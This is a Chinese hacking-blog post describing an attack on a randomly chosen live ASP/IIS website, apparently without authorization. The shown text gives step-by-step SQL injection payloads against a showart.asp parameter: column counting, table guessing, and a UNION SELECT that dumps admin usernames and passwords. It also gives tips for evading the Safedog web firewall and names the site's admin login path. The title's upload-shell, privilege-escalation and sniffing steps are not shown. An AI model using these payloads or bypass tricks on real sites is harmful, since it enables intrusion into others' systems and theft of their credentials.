记一次Sql注入+上传拿shell+提权+嗅探C段(图文)(注入)

总看见有人留言说要本博客出一个提权的文章,那我就将就弄一个吧。大家就将就看一下。由于没有事先准备,不知道有木有域环境,不过嗅探级别的还是应该会有。到时候再改嘛!

 

随便找了个网站,asp的(最爱),打开F12,查看信息。(最好不要去尝试搜索这个页面注入,我进去之后安装了个安全狗)

blob.png

asp iis6.0 目测win2003。


1.SQL注入

接下来太简单了,直接上payload不多解释了。

  • 字段数目

    showart.asp?art_id=540 and order by 11(返回200)

    showart.asp?art_id=540 and order by 12(返回500)

  • 猜表段

    showart.asp?art_id=540 and exists(select * from admin) (返回200)

  • 猜字段查询位置

    showart.asp?art_id=-540 union all select 1,2,3,4,5,6,7,8,9,10,11 from admin

    blob.png

  • 猜字段以及内容

    showart.asp?art_id=-540 union all select 1,2,3,admin_name,5,6,admin_password,8,9,10,11 from admin

    blob.png

  • 题外话:有了安全狗或者通用防注入怎么办?通常经验是%20变成%09,关键字里面加个%或者+,听说现在还有换行绕过,有机会试试。

  • 找后台登陆 /jwc/admin.asp

    blob.png


本文由Hack Blog原创,如需转载注明原文链接

作者:test 分类:漏洞 浏览:3381 评论:0
留言列表
发表评论
来宾的头像